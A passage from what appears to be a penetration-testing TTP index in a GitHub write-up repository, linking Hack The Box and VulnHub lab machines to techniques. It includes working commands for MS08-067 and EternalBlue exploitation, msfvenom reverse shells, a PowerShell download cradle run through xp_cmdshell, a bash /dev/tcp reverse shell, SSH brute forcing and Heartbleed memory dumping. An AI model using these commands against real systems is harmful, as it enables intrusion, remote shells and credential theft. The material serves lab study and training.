| |---|------|-------|-----------|------| | 1. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf) | [htb#108](https://app.hackthebox.eu/machines/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100" /> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | [+] https://zayotic.com/posts/oscp-reference/ [+] https://highon.coffee/blog/shellshock-pen-testers-lab-walkthrough/ [+] https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/ --- <a name="exploit_smb_ms08_067"></a> #### exploit_smb_ms08_067 [⇡](#exploit) (netapi exploit) for microsoft windows xp systems with open smb ports, use the [ms08-067](https://github.com/andyacer/ms08_067) metasploit module [`windows/smb/ms08_067_netapi`]() ```shell scan: nmap -v -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 <targetip> msfcli auxiliary/scanner/smb/ms08_067_check rhosts=<targetip> threads=100 E manual_a: wget https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows nc -nlvp <attackerport> python ms08_067_2018.py <targetip> <osid> <targetport> manual_b: searchsploit ms08-067 python /usr/share/exploitdb/platforms/windows/remote/7132.py <targetip> 1 msf: use exploit/windows/smb/ms08_067_netapi set RHOST <targetip> set LHOST <attackerip> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Legacy](https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf) | [htb#2](https://app.hackthebox.eu/machines/2) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png" width="100" height="100" /> | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067) | [+] https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067 [+] https://github.com/andyacer/ms08_067 [+] https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py [+] https://blog.rapid7.com/2014/02/03/new-ms08-067/ [+] https://0xdf.gitlab.io/2019/02/21/htb-legacy.html --- <a name="exploit_smb_ms17_010"></a> #### exploit_smb_ms17_010 [⇡](#exploit) (eternalblue exploit) for microsoft windows system with smb v1 enbaled, use the metasploit exploit `windows/smb/ms17_010_eternalblue` ```shell nmap -p 445 -script smb-check-vulns -script-args=unsafe=1 <targetip> manual: wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe nc -nlvp <attackerport> python send_and_execute.py <targetip> revshell.exe msf: use exploit/windows/smb/ms17_010_eternalblue set RHOST <targetip> set LHOST <attackerip> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blue](https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf) | [htb#51](https://app.hackthebox.eu/machines/51) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png" width="100" height="100" /> | [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [+] https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 [+] https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue [+] https://0xdf.gitlab.io/2019/02/21/htb-legacy.html [+] https://github.com/helviojunior/MS17-010/send_and_execute.py --- <a name="exploit_smb_nullsession"></a> #### exploit_smb_nullsession [⇡](#exploit) smb null sessions leak a lot of sensitive information about the target system. it could be useful to access open shares or to get sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_smb_usermap"></a> #### exploit_smb_usermap [⇡](#exploit) samba 3.0.0 - 3.0.25rc3 is vulnerable to remote command execution ```shell nc -nlvp <attackerport> sudo apt install python python-pip pip install --user pysmb git clone https://github.com/amriunix/CVE-2007-2447.git cd CVE-2007-2447/ python usermap_script.py <targetip> 139 <attackerip> <attackerport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lame](https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf) | [htb#1](https://app.hackthebox.eu/machines/1) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png" width="100" height="100" /> | [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap) | [+] https://nvd.nist.gov/vuln/detail/CVE-2007-2447 [+] https://github.com/amriunix/CVE-2007-2447 --- <a name="exploit_smb_web_root"></a> #### exploit_smb_web_root [⇡](#exploit) smb shared directory is mapped to the web server's root directory. read files to obtain sensitive information or upload a reverse shell file native to the web server and trigger it's execution to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_sql_login"></a> #### exploit_sql_login [⇡](#exploit) login to the target system using a sql service account ```shell mssqlclient.py -windows-auth "<username>@<targetip>" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="exploit_sql_xpcmdshell"></a> #### exploit_sql_xpcmdshell [⇡](#exploit) use the SQL xp_cmdshell method to gain command execution on the target system ```shell SELECT IS_SRVROLEMEMBER('sysadmin') ## check if current sql user has db sysadmin role, continue if true EXEC sp_configure 'Show Advanced Options', 1; reconfigure; sp_configure; EXEC sp_configure 'xp_cmdshell', 1 reconfigure; xp_cmdshell "whoami" type shell.ps1 ## create a powershell reverse shell xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://<attackerip>/shell.ps1\");" python3 -m http.server 80 ## serve the reverse shell via http ufw allow from <targetip> proto tcp to any port 80,<attackerport> ## allow incoming connection from <targetip> nc -nlvp <attackerport> ## listen for incoming reverse shell connection ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="exploit_sqli"></a> #### exploit_sqli [⇡](#exploit) target system is running a webapp that's vulnerable to sql injection ```shell sqlmap -u "http://<targetip>:<targetport>/<vulnwebapp>/index.php" --batch --forms --dump ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [CronOS](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf) | [htb#11](https://app.hackthebox.eu/machines/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 2. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 3. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 4. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | --- <a name="exploit_ssh_authorizedkeys"></a> #### exploit_ssh_authorizedkeys [⇡](#exploit) if we have access to a user's `.ssh` directory, copy our `id_rsa.pub` file to `.ssh/authorized_keys` to obtain passwordless ssh access | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 2. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="exploit_ssh_bruteforce"></a> #### exploit_ssh_bruteforce [⇡](#exploit) use hydra to bruteforce ssh password for a know user ```shell hydra -l anne -P "/usr/share/wordlists/rockyou.txt" -e nsr -s 22 ssh://<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_ssh_privatekeys"></a> #### exploit_ssh_privatekeys [⇡](#exploit) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | --- <a name="exploit_ssl_heartbleed"></a> #### exploit_ssl_heartbleed [⇡](#exploit) use nmap nse script to confirm heartbleed vulnerability and then sensepost exploit to dump memory from target system ```shell nmap --script=ssl-heartbleed -p <targetport> <targetip> python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin <targetip> -p <targetport> strings dump.bin ``` [+] https://github.com/sensepost/heartbleed-poc --- <a name="exploit_wordpress_defaultcreds"></a> #### exploit_wordpress_defaultcreds [⇡](#exploit) target system has wordpress configured with default credentials `admin/admin` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | --- <a name="exploit_wordpress_plugin"></a> #### exploit_wordpress_plugin [⇡](#exploit) certain wordpress installations might have a `/plugins/` directory that could provide source files or leak sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_wordpress_plugin_activitymonitor"></a> #### exploit_wordpress_plugin_activitymonitor [⇡](#exploit) wordpress plugin `Plainview Activity Monitor` is vulnerable to remote command injection | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | [+] https://www.exploit-db.com/exploits/45274 --- <a name="exploit_wordpress_plugin_hellodolly"></a> #### exploit_wordpress_plugin_hellodolly [⇡](#exploit) wordpress plugin `Hello Dolly` (default on stock wp installs) file `hello.php` is modified with php reverse shell code to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 2. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_wordpress_template"></a> #### exploit_wordpress_template [⇡](#exploit) edit a wordpress template file, like `404.php` and add php reverse shell code within it to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc"></a> ### ⚙️ PrivEsc [🡑](#ttps) <a name="privesc_anansi"></a> #### privesc_anansi [⇡](#privesc) the `anansi_util` application has `sudo` privileges. use it to run manual commands and upon error run `!/bin/bash` to execute root shell ```shell sudo /home/anansi/bin/anansi_util manual cat /etc/shadow - (press RETURN) !/bin/bash ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Brainpan: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf) | [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png" width="100" height="100" /> | [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof), [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="privesc_bash_reverseshell"></a> #### privesc_bash_reverseshell [⇡](#privesc) bash reverse shell command ```shell bash -i >& /dev/tcp/<attackerip>/<attackerport> 0>&1 ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#bash-reverse-shells --- <a name="privesc_bof"></a> #### privesc_bof [⇡](#privesc) craft exploit for the buffer overflow vulnerability to gain elevated privileges | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [IMF: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf) | [vh#162](https://www.vulnhub.com/entry/imf-1,162/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass), [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof) | --- <a name="privesc_chkrootkit"></a> #### privesc_chkrootkit [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | --- <a name="privesc_credsreuse"></a> #### privesc_credsreuse [⇡](#privesc) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | --- <a name="privesc_cron"></a> #### privesc_cron [⇡](#privesc) leverage cronjobs to modify and execute `root` owned files ```shell crontab -l cat /etc/crontab ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [CronOS](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf) | [htb#11](https://app.hackthebox.eu/machines/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 2. | [hackfest2016: Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf) | [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png" width="100" height="100" /> | [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 3. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), 